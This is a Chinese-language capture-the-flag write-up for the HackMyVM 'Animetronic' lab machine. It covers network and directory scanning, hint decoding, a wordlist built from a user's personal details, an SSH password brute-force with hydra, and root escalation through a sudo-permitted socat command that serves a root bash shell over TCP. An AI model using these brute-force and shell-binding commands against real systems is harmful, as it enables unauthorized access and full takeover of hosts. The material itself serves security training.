HakcMyVM-Animetronic

Animetronic

信息搜集

主机发现

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.2.0/24 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-08 07:43 EDT
Nmap scan report for animetronic (192.168.2.9)
Host is up (0.00011s latency).
MAC Address: 08:00:27:C6:94:8E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for kali (192.168.2.15)
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.38 seconds

端口扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- 192.168.2.9 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-08 07:45 EDT
Nmap scan report for animetronic (192.168.2.9)
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_  256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Animetronic
MAC Address: 08:00:27:C6:94:8E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms animetronic (192.168.2.9)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds

漏洞利用

目录扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.2.9 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt 
                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.2.9/
 🚩  In-Scope Url          │ 192.168.2.9
 🚀  Threads               │ 50
 📖  Wordlist              │ SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      308c http://192.168.2.9/img => http://192.168.2.9/img/
301      GET        9l       28w      308c http://192.168.2.9/css => http://192.168.2.9/css/
200      GET        4l     1058w    69597c http://192.168.2.9/js/jquery-slim.min.js
200      GET       42l       81w      781c http://192.168.2.9/css/animetronic.css
200      GET       52l      340w    24172c http://192.168.2.9/img/favicon.ico
301      GET        9l       28w      307c http://192.168.2.9/js => http://192.168.2.9/js/
200      GET        7l     1513w   144878c http://192.168.2.9/css/bootstrap.min.css
200      GET     2761l    15370w  1300870c http://192.168.2.9/img/logo.png
200      GET       52l      202w     2384c http://192.168.2.9/
301      GET        9l       28w      315c http://192.168.2.9/staffpages => http://192.168.2.9/staffpages/
200      GET      728l     3824w   287818c http://192.168.2.9/staffpages/new_employees
[####################] - 13m  5926216/5926216 0s      found:11      errors:0      
[####################] - 13m  1185240/1185240 1564/s  http://192.168.2.9/ 
[####################] - 13m  1185240/1185240 1555/s  http://192.168.2.9/img/ 
[####################] - 13m  1185240/1185240 1556/s  http://192.168.2.9/css/ 
[####################] - 13m  1185240/1185240 1556/s  http://192.168.2.9/js/ 
[####################] - 12m  1185240/1185240 1604/s  http://192.168.2.9/staffpages/

找到了new_employees

复制代码
┌──(kali㉿kali)-[~]
└─$ curl -O http://192.168.2.9/staffpages/new_employees
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--100  155k  100  155k    0     0  67.3M      0 --:--:-- --:--:-- --:--:-- 76.0M
                                                                     
┌──(kali㉿kali)-[~]
└─$ file new_employees 
new_employees: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=", progressive, precision 8, 703x1136, components 3
┌──(kali㉿kali)-[~]
└─$ echo "ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=" | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

得到了leahcim_rof_egassem

复制代码
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.2.9/staffpages/message_for_michael
Hi Michael

Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.

By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file 

personal_info.txt

找到了personal_info.txt

复制代码
┌──(kali㉿kali)-[~]
└─$ curl -O http://192.168.2.9/staffpages/personal_info.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--100   116  100   116    0     0  66820      0 --:--:-- --:--:-- --:--:--  113k
                                                                     
┌──(kali㉿kali)-[~]
└─$ cat personal_info.txt
name: Michael

age: 27

birth date: 19/10/1996

number of children: 3 " Ahmed - Yasser - Adam "

Hobbies: swimming

利用cupp生成一个字典

复制代码
┌──(kali㉿kali)-[~]
└─$ cupp -i                                        
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
  print("      \                     # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
  print("       \   \033[1;31m,__,\033[1;m             # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
  print("        \  \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m         # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
  print("           \033[1;31m(__)    )\ \033[1;m  ")
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Michael
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 19101996


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: Ahmed
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: y
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 9772 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!

爆破一下

复制代码
┌──(kali㉿kali)-[~]
└─$ hydra -l michael -P michael.txt -t 4 -f 192.168.2.9 ssh
[22][ssh] host: 192.168.2.9   login: michael   password: leahcim1996

ssh登录

复制代码
┌──(kali㉿kali)-[~]
└─$ ssh michael@192.168.2.9                                     
The authenticity of host '192.168.2.9 (192.168.2.9)' can't be established.
ED25519 key fingerprint is SHA256:6amN4h/EjKiHufTd7GABl99uFy+fsL6YXJJRDyzxjGE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.9' (ED25519) to the list of known hosts.
michael@192.168.2.9's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
New release '24.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Mon Nov 27 21:01:13 2023 from 10.0.2.6
michael@animetronic:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael)

权限提升

复制代码
michael@animetronic:~$ ls -la
total 28
drwxr-x--- 3 michael michael 4096 Nov 27  2023 .
drwxr-xr-x 4 root    root    4096 Nov 27  2023 ..
-rw------- 1 michael michael    5 Nov 27  2023 .bash_history
-rw-r--r-- 1 michael michael  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 michael michael 3771 Jan  6  2022 .bashrc
drwx------ 2 michael michael 4096 Nov 27  2023 .cache
-rw-r--r-- 1 michael michael  807 Jan  6  2022 .profile
michael@animetronic:~$ sudo -l
[sudo] password for michael: 
Sorry, user michael may not run sudo on animetronic.
michael@animetronic:~$ find / -perm -4000 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/su
/usr/bin/fusermount3
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
michael@animetronic:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
michael@animetronic:/home$ ls
henry  michael
michael@animetronic:/home$ cd henry
michael@animetronic:/home/henry$ ls -la
total 56
drwxrwxr-x   6 henry henry  4096 Nov 27  2023 .
drwxr-xr-x   4 root  root   4096 Nov 27  2023 ..
-rwxrwxr-x   1 henry henry    30 Jan  5  2024 .bash_history
-rwxrwxr-x   1 henry henry   220 Jan  6  2022 .bash_logout
-rwxrwxr-x   1 henry henry  3771 Jan  6  2022 .bashrc
drwxrwxr-x   2 henry henry  4096 Nov 27  2023 .cache
drwxrwxr-x   3 henry henry  4096 Nov 27  2023 .local
drwxrwxr-x 402 henry henry 12288 Nov 27  2023 .new_folder
-rwxrwxr-x   1 henry henry   807 Jan  6  2022 .profile
drwxrwxr-x   2 henry henry  4096 Nov 27  2023 .ssh
-rwxrwxr-x   1 henry henry     0 Nov 27  2023 .sudo_as_admin_successful                                                                     
-rwxrwxr-x   1 henry henry   119 Nov 27  2023 Note.txt
-rwxrwxr-x   1 henry henry    33 Nov 27  2023 user.txt
michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file named

aGVucnlwYXNzd29yZC50eHQK

解码出来:henrypassword.txt

复制代码
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam
michael@animetronic:/home/henry$ su henry
Password: 
henry@animetronic:~$ id
uid=1000(henry) gid=1000(henry) groups=1000(henry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User henry may run the following commands on animetronic:
    (root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:4444
┌──(kali㉿kali)-[~]
└─$ nc 192.168.2.9 4444
root@animetronic:/home/henry# id
id
uid=0(root) gid=0(root) groups=0(root)
相关推荐
网络安全许木2 小时前
自学渗透测试第八天(网络安全法、伦理规范与工具链联动)
windows·web安全·网络安全·渗透测试·kali linux
CHICX122917 小时前
2.MySQL 手工注入:从原理到 sqli-labs 实战
web安全·网络安全
菩提小狗17 小时前
每日安全情报报告 · 2026-04-07
网络安全·漏洞·cve·安全情报·每日安全
m0_7381207217 小时前
渗透基础知识ctfshow——Web应用安全与防护(第一章)
服务器·前端·javascript·安全·web安全·网络安全
聚铭网络18 小时前
聚铭网络荣获《一种安全事件误报的研判方法及系统》发明专利
网络安全
CDN36020 小时前
游戏盾与支付 / 广告 SDK 冲突:依赖顺序与隔离方案(踩坑实录)
运维·游戏·网络安全
vortex520 小时前
从应用层到内核层:SOCKS 代理与 TUN 模式全解析
网络·网络安全·渗透测试
hzxpaipai21 小时前
2026 杭州外贸网站制作公司哪家好?派迪科技确实有点技术
前端·科技·网络协议·网络安全
特别关注外国供应商1 天前
SSH 的 PrivX OT 工业安全远程访问 (ISRA) 被 分析机构 Industrial Cyber 认可
人工智能·网络安全·ssh·特权访问管理·工业安全远程访问·privx·ot 访问安全